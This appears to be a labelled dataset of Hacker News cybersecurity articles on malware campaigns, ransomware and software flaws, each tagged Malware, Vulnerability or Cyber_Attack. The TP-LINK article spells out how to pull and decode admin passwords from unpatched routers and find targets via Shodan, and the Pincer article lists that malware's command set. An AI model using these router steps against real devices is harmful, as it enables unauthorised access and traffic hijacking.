Beware: New Android Spyware Found Posing as Telegram and Threema Apps,https://thehackernews.com/2020/10/android-mobile-hacking.html,"A hacking group known for its attacks in the Middle East, at least since 2017, has recently been found impersonating legitimate messaging apps such as Telegram and Threema to infect Android devices with a new, previously undocumented malware.
""Compared to the versions documented in 2017, Android/SpyC23.A has extended spying functionality, including reading notifications from messaging apps, call recording and screen recording, and new stealth features, such as dismissing notifications from built-in Android security apps,"" cybersecurity firm ESET said in a Wednesday analysis.
First detailed by Qihoo 360 in 2017 under the moniker Two-tailed Scorpion (aka APT-C-23 or Desert Scorpion), the mobile malware has been deemed ""surveillanceware"" for its abilities to spy on the devices of targeted individuals, exfiltrating call logs, contacts, location, messages, photos, and other sensitive documents in the process.
In 2018, Symantec discovered a newer variant of the campaign that employed a malicious media player as a lure to grab information from the device and trick victims into installing additional malware.
Then earlier this year, Check Point Research detailed fresh signs of APT-C-23 activity when Hamas operators posed as young teenage girls on Facebook, Instagram, and Telegram to lure Israeli soldiers into installing malware-infected apps on their phones.
The latest version of the spyware detailed by ESET expands on these features, including the ability to collect information from social media and messaging apps via screen recording and screenshots, and even capture incoming and outgoing calls in WhatsApp and read the text of notifications from social media apps, including WhatsApp, Viber, Facebook, Skype, and Messenger.
The infection begins when a victim visits a fake Android app store called ""DigitalApps,"" and downloads apps such as Telegram, Threema, and weMessage, suggesting that the group's motivation behind impersonating messaging apps is to ""justify the various permissions requested by the malware.""
In addition to requesting invasive permissions to read notifications, turn off Google Play Protect, and record a user's screen under the guise of security and privacy features, the malware communicates with its command-and-control (C2) server to register the newly infected victim and transmit the device information.
The C2 servers, which typically masquerade as websites under maintenance, are also responsible for relaying the commands to the compromised phone, which can be used to record audio, restart Wi-Fi, uninstall any app installed on the device, among others.
What's more, it also comes equipped with a new feature that allows it to stealthily make a call while creating a black screen overlay to mask the call activity.
""Our research shows that the APT-C-23 group is still active, enhancing its mobile toolset and running new operations. Android/SpyC32.A – the group's newest spyware version — features several improvements making it more dangerous to victims,"" ESET said.
Apps downloaded from fraudulent third-party app stores has been a conduit for Android malware in recent years. It's always essential to stick to official sources to limit risk, and scrutinize permissions requested by apps before installing them on the device.
",Malware
"Exclusive: More than 200,000 Algerian TP-LINK Routers are vulnerable to Hackers",https://thehackernews.com/2014/01/TP-LINK-Routers-password-hacking.html,"More than 15.2% of the Algerian population use Internet service which is provided by around 30 Internet Service Providers and one of the largest shares is served by Algerie Telecom.
Algerie Telecom provides TP-LINK TD-W8951ND Router to most of their home customers who Opt-In for Internet services and each of which has ZYXEL embedded firmware installed in it.
ABDELLI Nassereddine, penetration tester and Algerian Computer Science Student has reported highly critical unauthorized access and password disclosure vulnerabilities in the Routers provided by Algerie Telecom.
He told 'The Hacker News' that the vulnerabilities can be exploited by any remote hacker just by exploiting a very simple loophole in the firmware.
First, he found that an unauthorized access is available to 'Firmware/Romfile Upgrade' Section on the Router's panel that can be accessed without any login password i.e. https://IP//rpFWUpload.htmlThis page actually allows a user to upgrade the Firmware of the router and also allows to download the Romfile Backup file (rom-0) i.e. https://IP address/rom-0 (as shown)
This Romfile contains the administrative password of the Router and can be retrieved in plain text by reverse engineering it using a free online service: https://50.57.229.26/zynos.php. One just need to upload the Romfile and can get plain text output easily. Router's password will be displaced in the very first line of the output, as shown below:
He claimed that he has tested the IP address range that belongs to Algeria i.e. 41.107. x. x and found thousands of them are vulnerable to hackers.
A Quick search on SHODAN Search Engine using keyword 'RomPager country:dz' showing more than 2,59,744 devices available on the Internet and 95% of them are now at risk.
ABDELLI also submitted an automated exploit POC script on GITHUB, that can scan the complete subnet for vulnerable routers and will display respective passwords on the screen, as shown:
I have tested the flaw over 100's of routers, and found this as a very critical bug. Simply by changing the DNS servers from the victim's router, one can redirect the users' traffic to any malicious server. Such attacks allow hackers to inject the malicious DNS server to perform advance phishing attacks against Facebook, Gmail, Bank Accounts and also whole system can also be compromised.
There is no patch yet available from the vendor, so to prevent yourself from such vulnerability you can forward port 80 to any other website or unused IP address of your network.
",Vulnerability
"Here's the Facebook Hacking Tool that Can Really Hack Accounts, But...",https://thehackernews.com/2016/02/facebook-hacking-tool.html,"Yes, you heard me right.
A newly discovered Facebook hacking tool actually has the capability to hack Facebook account, but YOURS, and not the one you desire to hack.
How to Hack Facebook account? How to Hack my Girlfriends Facebook account? My boyfriend is cheating on me, How do I hack his Facebook Account?
These are the queries that most of the Internet users search on Google.
But Beware! If you come across any Facebook hacking tool that promises you to help you hack your friends Facebook accounts, you may end up downloading a hacking tool that could hack you, instead of them.
Facebook Hacking Tool that Can Really Hack, But Your Accounts
Dubbed Remtasu, the tool is marketing itself as a Facebook hacking tool but actually is a Windows-based Trojan that has accelerated globally over the past year, and has now capability to disguise itself as an app for accessing people's Facebook account credentials.
The tool contains a Keylogger that can capture all your keystrokes and store them in a file that is subsequently sent to the attacker's server.
The malicious Facebook hacking tool is exploiting ""the constant desire of a lot of users to take control of accounts from this well-known social network,"" according to a Monday blog post by IT security company ESET.
How Remtasu Works:
The malicious tool is delivered via direct download websites.
Once a user visits one of these websites, the dangerous Win32/Remtasu.Y malware automatically gets downloaded and executed on victim's machine and hide itself among other files.
Remtasu has capability to:
Open and obtain information from the clipboard.
Capture keystrokes.
Store all the data in a file which is subsequently sent to an FTP server.
The worst part is yet to come:
The malware remains on the infected computer even when the victim reboots their system or attempts to find the malware threat in the list of active processes.
""In this case, the malware replicates itself, saving the copy in a folder that it also creates within the system32 folder,"" reads the post. ""The new InstallDir folder remains hidden inside the system files, making it difficult for users to access.""
Most affected parts of the world include Colombia, Turkey, Thailand and elsewhere. In past, Remtasu was distributed through malicious files attached to phishing emails purporting to be from legitimate government or businesses organisations.
",Malware
Tumblr Patches A Flaw That Could Have Exposed Users' Account Info,https://thehackernews.com/2018/10/tumblr-account-hacking.html,"Tumblr today published a report admitting the presence of a security vulnerability in its website that could have allowed hackers to steal login credentials and other private information for users' accounts.
The affected information included users email addresses, protected (hashed and salted) account passwords, self-reported location (a feature no longer available), previously used email addresses, last login IP addresses, and names of the blog associated with every account.
According to the company, a security researcher discovered a critical vulnerability in the desktop version of its website and responsibly reported it to the Tumblr security team via its bug bounty program.
Though the company has not revealed the researcher's name or any technical details about the vulnerability, Tumblr has disclosed that the flaw resided in the ""Recommended Blogs"" feature of its website.
Recommended Blogs has been designed to display a short, rotating list of blogs of other users that may be of interest. The feature appears only for logged-in users.
Tumblr also says:
""If a blog appeared in the module, it was possible, using debugging software in a certain way, to view certain account information associated with the blog.""
In short, your account could only be affected if it was recommended to some an attacker via the vulnerable feature.
The company fails to determine which specific accounts were recommended via the vulnerable feature, thus is unable to disclose the number of affected users, but it concludes that ""the bug was rarely present.""
Tumblr also assured that its internal investigation found no evidence of the bug being abused by an attacker.
""It's our mission to provide a safe space for people to express themselves freely and form communities around things they love,"" Tumblr says. ""We feel that this bug could have affected that experience. We want to be transparent with you about it. In our view, it's simply the right thing to do.""
Tumblr disclosure comes less than a week after Facebook announced its worst-ever security breach that allowed attackers to steal personal information, including secret access tokens, for 30 million users.
Also, over a week ago Google announced the shut down of its social media network Google+ following a massive data breach that exposed the private data of hundreds of thousands of Google Plus users to third-party developers.
Late last month, Twitter also revealed a similar security breach incident in which an API flaw inadvertently exposed direct messages (DMs) and protected tweets of more than 3 million people to unauthorized third-party app developers.
",Vulnerability
Turkish Hacker Crashes Google Play Store Twice while testing vulnerability,https://thehackernews.com/2014/03/turkish-hacker-crashes-google-play.html,"Last Weekend Google Play Store was crashed twice by a Turkish hacker when he tried to test vulnerability he discovered on the Android apps publishing system, known as Google's Developer Console.
Turkish hacker 'Ibrahim Balic' claimed responsibility for the Google Play Store attack and told 'The Hacker News', he found a flaw in the Android operating system while working with Android tools i.e. Compiler, debugger on his Emulators, that was crashing again and again. 'I successfully confirmed that it affects Android 4.2.2 , 4.3 and 2.3' he said.
Then he created an Android app to exploit the vulnerability, 'causes a possible memory corruption' and uploaded it to the Google's Developer Console.
Unfortunately, OR Luckily the malformed Android app crashed whole Google's Developer Console, and he didn't expect that the app will knock everyone offline from Play Store.
He was not sure about the outage caused by him or not, ""I just wanted to be sure about (the) vulnerability,"" so he uploaded the 'malformed APK file' again second time to the Google Play Store, that results in crash of Google Play Store, not once, but twice.
The first crashed around mid-day on Sunday and the same happened again on Monday when he tried a second time, leaving Android users unable to download new apps and games, and developers unable to update their own apps. However, the outage was so minimal that not many of us even noticed.
This is not the first time he messed up with app stores. Last July, Apple was forced to take its developer site offline after Ibrahim uncovered multiple vulnerabilities in it.
He also apologized for the inconvenience caused to his online fellows. ""I didn't have any malicious aim,"" Ibrahim said to CNN Money. ""I am so sorry for this damage.""
Ibrahim reported the flaw to the Google Security Team and has yet to hear back from them about the issue. The Play Store is becoming much wider, and Google should focus hard on their security parameters.
",Vulnerability
First Android Ransomware that Encrypts SD Card Files,https://thehackernews.com/2014/06/first-android-ransomware-that-encrypts.html,"We have seen cybercriminals targeting PCs with Ransomware malware that encrypts your files or lock down your computer and ask for a ransom amount to be paid in a specified duration of time to unlock it.
To deliver the Ransomware malwares to the mobile devices, cyber criminals have already started creating malicious software programs for android devices. Last month, we reported about a new Police Ransomware malware that locks up the devices until the victims pay a ransom to get the keys to unlock the phone. But, the malware just lock the mobile screen and a loophole in the its implementation allowed users to recover their device and data stored on SDcard.
Now, in an effort to overcome this, threat actors have adopted encryption in the development of mobile Ransomware malwares. Recently, the security firm ESET has discovered a new Android ransomware, dubbed as Android/Simplocker.A, that has ability to encrypt the files on the device SD card and then demand a ransom from the victim in order to decrypt those files.
Once installed, the malware scans the SD card for certain file types such as image, document or video with extensions - jpeg, jpg, png, bmp, gif, pdf, doc, docx, txt, avi, mkv, 3gp, mp4 and encrypts them using AES in a separate thread in the background. After encrypting the files, the malware displays the following ransom message, written in Russian, which clearly means that this threat is targeting Russian Android users.
""WARNING your phone is locked!
The device is locked for viewing and distributing child pornography , zoophilia and other perversions.
To unlock you need to pay 260 UAH.
1.) Locate the nearest payment kiosk.
2.) Select MoneXy
3.) Enter {REDACTED}.
4.) Make deposit of 260 Hryvnia, and then press pay. Do not forget to take a receipt!
After payment your device will be unlocked within 24 hours. In case of no PAYMENT YOU WILL LOSE ALL DATA ON your device!""
The Ransomware malware directs victim to pay the ransom amount i.e. 260 UAH, which is roughly equal to $21 US, through the MoneXy service, as this payment service is not easily traceable as the regular credit card.
To maintain anonymity the malware author is using the Command-and-Control server hosted on TOR .onion domain and the malware sends the information of the infected device such as IMEI number to its server. The researchers at ESET are still analysing the malware:
""Our analysis of the Android/Simplock.A sample revealed that we are most likely dealing with a proof-of-concept or a work in progress – for example, the implementation of the encryption doesn't come close to ""the infamous Cryptolocker"" on Windows.""
The researchers have found that the malware is capable to encrypt the victim's files, which could be lost if the decryption key is not retrieved from the malware author by paying the ransom amount, but on the other hand the researchers strongly advise users against paying fine, as their is no guarantee that the hacker will provide you decryption keys even after paying the amount.
Unfortunately, mobile antivirus products are only capable to detect such known/detected threats only and can't detect similar the new threats. So, it is important for you to always keep the back-up of all your files either manually on the computer system or use cloud backup services like dropbox, google drive etc, in order to protect it from the emerging threats.
",Malware
Tracy Morgan Dead? Facebook Scam Targeting Users with Malware,https://thehackernews.com/2014/06/tracy-morgan-dead-facebook-scam.html,"Oh MY God! Is Tracy Morgan Really Dead? NO, Thankfully it's only a hoax, but scammers announced the popular comedian and actor Tracy Morgan dead.
Another Facebook scam is circulating across the social networking website just a day before the former ""Saturday Night Live"" and ""30 Rock"" star Tracy Morgan was critically hurt in a six-vehicle fatal accident on the New Jersey Turnpike that killed his friend and writer 62-year-old James McNair.
With the rise in various scams on the popular social networking giant, Facebook that has more than one billion active users, it became very clear that not only does the social networking platform provide special opportunities for people to connect and share information, but serves as a great platform for scammers as well.
TOTAL SCAM LEADS TO MALWARE
Scammers spare no incident to target as many victims as possible, and this time they made use of this roadway accident to target users by spreading the fake Facebook videos proclaiming the death of Tracy Morgan.
Malwarebytes warned about the Morgan video scam, saying that the fake video tricks users into sharing it that are spreading throughout the social network, with the Title, ""[Death Video] R.I.P. Tracy Morgan died few minutes ago in hospital.""
Once clicked, users are directed to share the fake videos and along with the video sharing, the spam leads users to download a file, which could be anything from a Potentially Unwanted Program (PUP) to a malicious software that could steal users' sensitive or financial information from the infected system.
TRACY MORGAN DEAD? RUMORS REACHED TWITTER AS WELL
In response to this false news, people began tweeting that Tracy had passed away on June 10. The fake news spread like fire on the internet. Following are the tweets by his Fans:
JUST IGNORE IT
""Pay no attention to scammy and sensational sounding videos appearing on your Facebook feed and stick to trusted news sources for breaking stories and information,"" warned Malwarebytes. ""Surveys are always a pain, but scam sites offering up random redirects always carry the potential to be even more problematic – you simply never know where you're going to end up.""
We have seen various suspicious posts on Facebook, like ""See your Friend's naked video"", an app offering you a chance to see who has viewed your Facebook profile, and many more. Sometimes these scams are very obvious and easily avoidable, but many times they are irresistible and easy to fall for, like this new fake video scam.
SCAMS AT RISE, SO BE SAFE
With more tech skills, modern scammers have ability to reach billions of potential victims with just a single message or post, and their scams are getting more dangerous and critical day-by-day. Despite Facebook's security measures, safe and secured social networking rests in your own hands and if you aren't paying attention to such scams, you could fall for one such even without ever realizing.
So, if you are served with any suspicious link or post, do not try to click on it, no matter even if it's from your closest friend.
",Malware
Warning: Android Bitcoin wallet apps vulnerable to theft,https://thehackernews.com/2013/08/hacking-bitcoin-android-vulnerability-digital-wallets.html,"A critical vulnerability in the Android implementation of the Java SecureRandom random number generator was discovered, that leaves Bitcoin digital wallets on the mobile platform vulnerable to theft.
Before the announcement was made, users on the forums had noticed over 55 BTC were stolen a few hours after the client improperly signed a transaction using the compromised random number generator.
Bitcoin is a virtual currency that makes use of cryptography to create and transfer bitcoins. Users make use of digital wallets to store bitcoin addresses from which bitcoins are received or sent.
Bitcoin uses public-key cryptography so that each address is associated with a pair of mathematically linked public and private keys that are held in the wallet.
Because the problem is rooted in the operating system, every Bitcoin digital wallet generated by an Android app is affected by the weakness, including Bitcoin Wallet, blockchain.info wallet, Bitcoin Spinner, and Mycelium Wallet.
The developers have recommended that users generate a new address with a repaired random number generator and then send all the money in the wallet back to themselves. If you use an Android wallet then we strongly recommend you to upgrade to the latest version available in the Play Store as soon as one becomes available.
The virtual currency that can be transferred worldwide using peer-to-peer software is forcing bids to regulate it, including in the U.S. The Financial Crimes Enforcement Network of the U.S Department of the Treasury.
",Vulnerability
"Book Review: Hacking Point of Sale, In-Depth Study on Payment Applications",https://thehackernews.com/2014/05/book-review-hacking-point-of-sale-in.html,"Point-of-sale (POS) is the hottest topic in payment structures and its one of the most popular technology topics as well. A Point-of-sale (POS) machine is a computerized replacement for a cash register. It has ability to quickly process a customer's transaction, accurately keep the records, process credit and debit cards, connect to other systems in a network, and manage inventory.
A basic POS system would consist of a computer as its core part provided with application specific programs for the particular environment in which it will serve, along with a cash drawer, barcode scanner, receipt printer and the appropriate POS software. Point-of-sale (POS) terminals are used in most industries that have a point of sale such as a service desk, including restaurants, lodging, entertainment, and museums.
Due to the better track inventory and accuracy of records, the Point-of-sale (POS) machine is used worldwide and it can be easily set-up, depending on the nature of the business. But on the other hand, Point-of-sale (POS) systems are critical components in any retail environment and the users are not aware of the emerging threats it poses in near future.
Last week I read an excellent book entitled 'HACKING POINT OF SALE', written by Slava Gomzine, that summarizes, systemizes, and shares knowledge about payment application security.
In the Book, the author covers all the aspects of card payment processing from the security point of view that mainly depends on confidentiality, integrity, and availability.
In past few months, we have seen many massive data breaches targeting POS machines and the largest one is TARGET data breach occurred during the last Christmas holidays. The third-largest U.S. Retailer in which over 40 million Credit & Debit cards were stolen, used to pay for purchases at its 1500 stores nationwide in the U.S.
Not Target alone, multiple retailers including Neiman Marcus, Michaels Store were also targeted involving the heist of possibly 110 million Credit-Debit cards, and personal information.
Later, Target and other retailers confirmed that a malware was embedded in point-of-sale (POS) equipment at its checkout counters to collect secure data as the credit cards were swiped during transactions. That means the main theft resides in the company's POS system.
The Book 'Hacking Point of Sale: Payment Application Secrets, Threats, and Solutions' is all about the In-Depth technical information of attacks and vulnerabilities in Point-of-sale (POS) system, along with the extensive knowledge about the mitigation and protection measures.
THE BOOK WALKS THE READER THROUGH -
Technological overview of Electronic payment systems
POS applications architecture
Communication protocols
Attacks on Point-of-sale Systems
Step-by-step explanation of credit card fraud processes
POS payment application vulnerabilities and non-software attacks
Weak Encryption mechanisms and Poor key management
How to prevent attacks on payment applications using Cryptography
How to Protect the cardholders' sensitive information
How to protect the application itself by utilizing client and server certificates, digital signatures, and code obfuscation.
From a security perspective, the most critical risk lies in the payment process, because if the information that the customers hand over is captured somehow, the cyber criminals can use it to commit credit card frauds.
Also, many point-of-sale (POS) terminals are built using embedded versions of Microsoft Windows, which means that it is trivial for an attacker to create and develop malware that would run on a POS terminal.
Attackers can also steal the information by leveraging the weakness in the point-of-sale (POS) environment such as unprotected memory, unencrypted network transmission, poorly encrypted disk storage, card reader interface, or compromised pinpad device.
There are more than a billion active credit and debit card users in US alone, thus an active target for money motivated hackers. If we look at the figures, in 2011, POS terminals and payment card information was involved in almost 48% of security breaches which is more than any other data type breach.
Due to lack of concern and security measures, point-of-sale (POS) systems have become an attractive target for cybercriminals and to overcome the upcoming threats we should know its architecture, the areas of attacks and the defense measures.
Either you are a Developer, Security Architect , QA Analyst, Security Researcher or a Hacker, this book is really for you to grab the in-depth research of the point-of-sale (POS) systems, how it works, how it could be exploited, and what protection measures should be taken.
The Publisher 'Wiley' is offering a special 50% Discount on 'Hacking Point of Sale' book only for 'The Hacker News' readers, so get your copy today. Stay Tuned!
",Vulnerability
New Fileless Malware Uses DNS Queries To Receive PowerShell Commands,https://thehackernews.com/2017/03/powershell-dns-malware.html,"It is no secret that cybercriminals are becoming dramatically more adept, innovative, and stealthy with each passing day.
While new forms of cybercrime are on the rise, traditional activities seem to be shifting towards more clandestine techniques that involve the exploitation of standard system tools and protocols, which are not always monitored.
The latest example of such attack is DNSMessenger – a new Remote Access Trojan (RAT) that uses DNS queries to conduct malicious PowerShell commands on compromised computers – a technique that makes the RAT difficult to detect onto targeted systems.
The Trojan came to the attention of Cisco's Talos threat research group by a security researcher named Simpo, who highlighted a tweet that encoded text in a PowerShell script that said 'SourceFireSux.' SourceFire is one of Cisco's corporate security products.
DNSMessenger Attack Is Completely Fileless
Further analysis of the malware ultimately led Talos researchers to discover a sophisticated attack comprising a malicious Word document and a PowerShell backdoor communicating with its command-and-control servers via DNS requests.
Distributed through an email phishing campaign, the DNSMessenger attack is completely Fileless, as it does not involve writing files to the targeted system; instead, it uses DNS TXT messaging capabilities to fetch malicious PowerShell commands stored remotely as DNS TXT records.
This feature makes it invisible to standard anti-malware defenses.
PowerShell is a powerful scripting language built into Windows that allows for the automation of system administration tasks.
The malicious Word document has been crafted ""to appear as if it were associated with a secure e-mail service that is secured by McAfee,"" according to a blog post published by Talos researchers Edmund Brumaghin and Colin Grady on Thursday.
Here's How the DNSMessenger attack Works:
When opened, the document launches a Visual Basic for Applications (VBA) macro to execute a self-contained PowerShell script in an attempt to run the backdoor onto the target system.
What's interesting? Everything, until this point, is done in memory, without writing any malicious files to the system's disk.
Next, the VBA script unpacks a compressed and sophisticated second stage of PowerShell, which involves checking for several parameters of the target environment, like the privileges of the logged-in user and the version of PowerShell installed on the target system.
This information is then used to ensure persistence on the infected host by changing the Windows Registry and installing a third stage PowerShell script that contains a simple backdoor.
The backdoor is being added to the Windows Management Instrumentation (WMI) database, if the victim does have administrative access, allowing the malware backdoor to stay persistent on the system even after a reboot.
The backdoor is an additional script that establishes a sophisticated 2-way communications channel over the Domain Name System (DNS) – usually used to look up the IP addresses associated with domain names, but has support for different types of records.
The DNSMessenger malware backdoor uses DNS TXT records that, by definition, allows a DNS server to attach unformatted text to a response.
The backdoor periodically sends DNS queries to one of a series of domains hard-coded in its source code. As part of those requests, it retrieves the domain's DNS TXT record, which contains further PowerShell commands that are executed but never written to the local system.
Now, this ""fourth stage"" Powershell script is the actual remote control tool used by the malware attacker.
This script queries the command-and-control servers via DNS TXT message requests to ask what commands to execute. Any command received is then executed, and the output is communicated back to the C&C server, allowing the attacker to execute any Windows or application commands on the infected system.
All attackers need to do is leave malicious commands and instructions inside the TXT records of their domains, which, when queried, is executed via the Windows Command Line Processor, and the output is sent back as another DNS query.
The domains registered by the DNSMessenger RAT are all down, so till now, it is not known that what types of commands the attackers relayed to infected systems. However, the researchers say this particular RAT was used in a small number of targeted attacks.
""This malware sample is an excellent example of the length attackers are willing to go to stay undetected while operating within the environments that they are targeting,"" the Talos researchers said.
""It also illustrates the importance that in addition to inspecting and filtering network protocols such as HTTP/HTTPS, SMTP/POP3, etc. DNS traffic within corporate networks should also be considered a channel that an attacker can use to implement a fully functional, bidirectional C2 infrastructure.""
This is not the first time when the researchers came across a Fileless malware. At early last month, Kaspersky researchers also discovered fileless malware, that resides solely in the memory of the compromised computers, targeting banks, telecommunication companies, and government organizations in 40 countries.
",Malware
Remote Execution Flaw Threatens Apps Built Using Spring Framework — Patch Now,https://thehackernews.com/2018/04/spring-framework-hacking.html,"Security researchers have discovered three vulnerabilities in the Spring Development Framework, one of which is a critical remote code execution flaw that could allow remote attackers to execute arbitrary code against applications built with it.
Spring Framework is a popular, lightweight and an open source framework for developing Java-based enterprise applications.
In an advisory released today by Pivotal, the company detailed following three vulnerabilities discovered in Spring Framework versions 5.0 to 5.0.4, 4.3 to 4.3.14, and older unsupported versions:
Critical: Remote Code Execution with spring-messaging (CVE-2018-1270)
High: Directory Traversal with Spring MVC on Windows (CVE-2018-1271)
Low: Multipart Content Pollution with Spring Framework (CVE-2018-1272)
Vulnerable Spring Framework versions expose STOMP clients over WebSocket endpoints with an in-memory STOMP broker through the 'spring-messaging' module, which could allow an attacker to send a maliciously crafted message to the broker, leading to a remote code execution attack (CVE-2018-1270).
""The use of authentication and authorization of messages, such as the one provided by Spring Security, can limit exposure to this vulnerability only to users who are allowed to use the application,"" the company suggests.
The second bug (CVE-2018-1271) resides in Spring's Web model-view-controller (MVC) that allows attackers to execute directory traversal attack and access restricted directories when configured to serve static resources (e.g., CSS, JS, images) from a file system on Windows.
This vulnerability doesn't work if you are not using Windows to serve content and can be avoided if you don't serve files from the file system or use Tomcat/WildFly as the server.
Pivotal has released Spring Framework 5.0.5 and 4.3.15, which include fixes for all the three vulnerabilities. The company has also released Spring Boot 2.0.1 and 1.5.11, that match the patched Spring Framework versions.
So developers and administrators are highly recommended to upgrade their software to the latest versions immediately.
",Vulnerability
Unpatched Python and Java Flaws Let Hackers Bypass Firewall Using FTP Injection,https://thehackernews.com/2017/02/python-java-ftp-protocol-injection.html,"This newly discovered bugs in Java and Python is a big deal today.
The two popular programming languages, Java and Python, contain similar security flaws that can be exploited to send unauthorized emails and bypass any firewall defenses.
And since both the flaws remain unpatched, hackers can take advantage to design potential cyber attack operations against critical networks and infrastructures.
The unpatched flaws actually reside in the way Java and Python programming languages handle File Transfer Protocol (FTP) links, where they don't syntax-check the username parameter, which leads to, what researchers call, protocol injection flaw.
Java/Python FTP Injection to Send Unauthorized SMTP Emails
In a blog post published over the past week, security researcher Alexander Klink detailed the FTP protocol injection vulnerability in Java's XML eXternal Entity (XXE) that allows attackers to inject non-FTP malicious commands inside an FTP connection request.
To demonstrate the attack, Alexander showed how to send an unauthorized email via SMTP (Simple Mail Transfer Protocol) in an FTP connection attempt, even though the FTP connection failed, as FTP servers does support authentication, but doesn't check for the present of carriage returns (CR) or line feeds (LF) in usernames.
""This attack is particularly interesting in a scenario where you can reach an (unrestricted, maybe not even spam- or malware-filtering) internal mail server from the machine doing the XML parsing,"" Alexander concluded.
Java/Python FTP Injections Allow to Bypass Firewall
However, two days later in a separate security advisory, security researcher Timothy Morgan from Blindspot Security came forward with his findings, showing more threatening exploitation scenario where the FTP URL handlers in both Java and Python can be used to bypass firewalls.
Morgan said such FTP protocol injection flaw could be used to trick a victim's firewall into accepting TCP connections from the web to the vulnerable host's system on its ""high"" ports (from 1024 to 65535).
Besides the FTP protocol injection attack, there's reside a decade old security issue in FTP protocol called classic mode FTP – an insecure mechanism of client-server FTP interactions, but many firewall vendors still support it by default.
When a classic mode FTP connection is initiated, the firewall temporarily opens a port – typically between 1024 and 65535 – specified in the PORT command, which introduces security risks.
Using the FTP protocol injection issue in Java and Python, an attacker who knows the targeted host's internal IP address can start a classic mode FTP connection, which attackers can use for nefarious purposes.
Morgan has determined that an attacker can open up one port in the targeted firewall with only three requests:
Identify the victim's internal IP address – this requires an attacker to ""send an URL, see how the client behaves, then try another until the attack is successful.""
Determine packet alignment and ensure that the PORT command is injected at the right moment, making the attack work.
Exploit the vulnerability.
Each additional request can be used to open up another TCP port.
Easily Exploitable Protocol Injection Flaw
However, the researcher warned that his exploit could be used for man-in-the-middle (MitM) attacks, server-side request forgery (SSRF), an XEE attack and more – and once bypassed the firewall, desktop hosts can be attacked even if they do not have Java installed.
All an attacker need is to convince victims into accessing a malicious Java or Python applications installed on a server to bypass the entire firewall.
""If a desktop user could be convinced to visit a malicious website while Java is installed, even if Java applets are disabled, they could still trigger Java Web Start to parse a JNLP (Java Network Launch Protocol) file,"" Morgan said. ""These files could contain malicious FTP URLs which trigger this bug.""
""Also note, that since Java parses JNLP files before presenting the user with any security warnings, the attack can be entirely successful without any indication to the user (unless the browser itself warns the user about Java Web Start being launched).""
According to Morgan, a nearly identical flaw also exists in Python's urllib2 and urllib libraries, although ""this injection appears to be limited to attacks via directory names specified in the URL.""
Protocol Injection Flaw Is Still Unpatched
Morgan said the FTP protocol injection flaw was reported to the Python team in January 2016 and Oracle in November 2016 by his company, but neither of the two has issued any update to address the issue.
Morgan has developed a proof-of-concept (PoC) exploit but is currently holding back publication of his exploit until Oracle and Python respond to the disclosure and release patches.
The Morgan's exploit has successfully been tested against Palo Alto Networks and Cisco ASA firewalls, though researchers believe many commercial firewalls are also vulnerable to FTP stream injection attacks.
So until patches become available, Morgan suggests users uninstall Java on their desktops and in browsers, as well as disable support for ""classic mode"" FTP on all firewalls.
",Cyber_Attack
Iframe Injection & Blind SQL Injection vulnerability on Apple.com exposed by Idahc(lebanese hacker),https://thehackernews.com/2011/07/iframe-injection-blind-sql-injection.html,"Iframe Injection & Blind SQL Injection vulnerability on Apple.com exposed by Idahc(lebanese hacker)
After Sony hacks, Idahc(lebanese hacker) is back to strike Apple.com . He found two vulnerability on https://consultants.apple.com/ as listed below.
Iframe Injection : Click here
Blind SQL INjection: Click Here
Examples of the injections:
Example One
Example two
Two days before Another sub-domain of Apple's database was hacked with SQL injection by Anonymous : Read Here
Hacker Expose the Database ,extracted using Blind Sql injection on a pastebin link.
According to Hacker ""I am Idahc(lebanese hacker) I found a Blind SQLI and Iframe Injection on AppleI am not one of Anonymous or Lulzsecand I am against The ANTISEC OPERATIONBUt this is a poc with not confidential informationI didn't dump users,emails,passwords........"".
",Vulnerability
WildPressure APT Emerges With New Malware Targeting Windows and macOS,https://thehackernews.com/2021/07/wildpressure-apt-emerges-with-new.html,"A malicious campaign that has set its sights on industrial-related entities in the Middle East since 2019 has resurfaced with an upgraded malware toolset to strike both Windows and macOS operating systems, symbolizing an expansion in both its targets and its strategy around distributing threats.
Russian cybersecurity firm attributed the attacks to an advanced persistent threat (APT) it tracks as ""WildPressure,"" with victims believed to be in the oil and gas industry.
WildPressure first came to light in March 2020 based off of a malware operation distributing a fully-featured C++ Trojan dubbed ""Milum"" that enabled the threat actor to gain remote control of the compromised device. The attacks were said to have begun as early as August 2019.
""For their campaign infrastructure, the operators used rented OVH and Netzbetrieb virtual private servers (VPS) and a domain registered with the Domains by Proxy anonymization service,"" Kaspersky researcher Denis Legezo noted last year.
Since then, new malware samples used in WildPressure campaigns have been unearthed, including a newer version of the C++ Milum Trojan, a corresponding VBScript variant with the same version number, and a Python script named ""Guard"" that works across both Windows and macOS.
The Python-based multi-OS Trojan, which extensively makes of publicly available third-party code, is engineered to beacon the victim machine's hostname, machine architecture, and OS release name to a remote server and check for installed anti-malware products, following which it awaits commands from the server that allow it to download and upload arbitrary files, execute commands, update the Trojan, and erase its traces from the infected host.
The VBScript version of the malware, named ""Tandis,"" features similar capabilities to that of Guard and Milum, while leveraging encrypted XML over HTTP for command-and-control (C2) communications. Separately, Kaspersky said it found a number of previously unknown C++ plugins that have been used to gather data on infected systems, such as recording keystrokes and capturing screenshots.
What's more, in what appears to be an evolution of the modus operandi, the latest campaign — besides relying on commercial VPS — also weaved compromised legitimate WordPress websites into their attack infrastructure, with the websites serving as Guard relay servers.
To date, there's neither clear visibility regarding the malware spreading mechanism nor any strong code- or victim-based similarities with other known threat actors. However, the researchers said they spotted minor ties in the techniques used by another adversary called BlackShadow, which also operates in the same region.
The ""tactics aren't unique enough to come to any attribution conclusion – it's possible both groups are simply using the same generic techniques and programming approaches,"" Legezo said.
",Cyber_Attack
New Android malware forwards incoming messages to hacker,https://thehackernews.com/2013/05/android-malware-that-sends-incoming.html,"A new type of Android malware that can intercept text messages and forwarding to hackers is discovered by the Russian firm Doctor Web. This is a very serious threat to users, because using this malware attackers can easily get two factor authentication code of your Email or bank accounts.
The malware, dubbed as Android.Pincer.2.origin, is the second form of the original Android.Pincer malware and is distributed as security certificates that the user must install.
Upon launching Android.Pincer.2.origin, the user will see a fake notification about the certificate's successful installation but after that, the Trojan will not perform any noticeable activities for a while.
Android.Pincer.2.origin connects to a server and send text messages in addition to the other information as the smartphone model, serial, IMEI and phone number and the Android version is used.
To malware then receive instructions from commands in the following format:
start_sms_forwarding [telephone number] - begin intercepting communications from a specified number
stop_sms_forwarding - stop intercepting messages
send_sms [phone number and text] - send a short message using the specified parameters
simple_execute_ussd - send a USSD message
stop_program - stop working
show_message - display a message on the screen of the mobile device
set_urls - change the address of the control server
ping - send an SMS containing the text 'pong' to a previously specified number
